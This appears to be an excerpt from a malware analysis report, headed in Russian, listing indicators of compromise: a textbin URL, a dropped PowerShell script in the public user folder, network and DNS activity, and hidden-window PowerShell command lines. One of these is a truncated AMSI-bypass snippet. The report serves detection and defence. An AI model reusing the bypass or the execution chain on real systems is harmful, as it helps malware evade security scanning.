Техническая информация
- https://textbin.net/raw/7hfwowjb0j
- C:\users\public\autosystemwindowshandler.ps1
- 'microsoft.com':80
- 'SQ#####.site4now.net':1433
- 'te##bin.net':443
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'SQ#####.site4now.net':1433
- 'te##bin.net':443
- DNS ASK microsoft.com
- DNS ASK SQ#####.site4now.net
- DNS ASK te##bin.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -Command [System.Type[]] $types = [Ref].Assembly.GetTypes();$amsi = $types.Where({$_.Name -like '*iUtils'});[System.Reflection.FieldInfo[]] $fields = $amsi.GetFiel...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -File C:\Users\Public\AutoSystemWindowsHandler.PS1' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -File C:\Users\Public\AutoSystemWindowsHandler.PS1